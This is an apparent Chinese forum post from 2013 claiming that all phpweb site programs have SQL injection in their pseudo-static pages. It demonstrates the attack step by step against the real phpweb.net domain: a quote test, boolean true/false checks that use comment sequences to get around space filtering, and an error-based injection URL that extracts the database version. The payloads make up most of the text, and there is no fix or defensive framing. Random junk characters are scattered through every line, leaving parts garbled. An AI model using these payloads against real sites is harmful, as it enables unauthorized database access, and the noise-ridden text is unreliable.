phpweb所有的整站程序伪静态页面都存在sql注入* d% t- M1 G& w4 I0 ^. F
( J( g4 ~% p" i: m
主站:http://phpweb.net/
. Q. Q1 _1 u9 |! u* K加’检测:$ @7 e5 r, ]6 M0 w" [/ a
) O& Q( ?- i2 W Y/ n0 Shttp://www.phpweb.net/down/html/?772′.html( o5 K' |1 m6 r9 @0 d' w$ T" q- R
8 F5 K* d, @9 _. G4 q3 K5 r) [出错: b; `2 ? } [: m6 h7 ]% O
存在注入。
+ \( J/ f( L* d, s! A, T( R不能用空格,只能用/*罗
: U+ H1 D* q5 y) ^) O- G1 Fhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
# w( `1 }0 V2 V: b
5 Y- Y' H5 K) e9 whttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.! _4 u+ [- [8 _. h4 ?
爆数据库版本:
& [! P3 u* n. v/ S # z1 x' H8 \3 k+ x) L
?
/ K( p+ r* F. e) q6 p1. A. F+ d8 x; K: C! y
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
) \+ Q' s# ~. s: D O更新日期: 2013-01-03 13:39:50 x7 I0 m) i+ {; b/ z
|
发表于 2013-1-4 19:46:42
收藏
支持
反对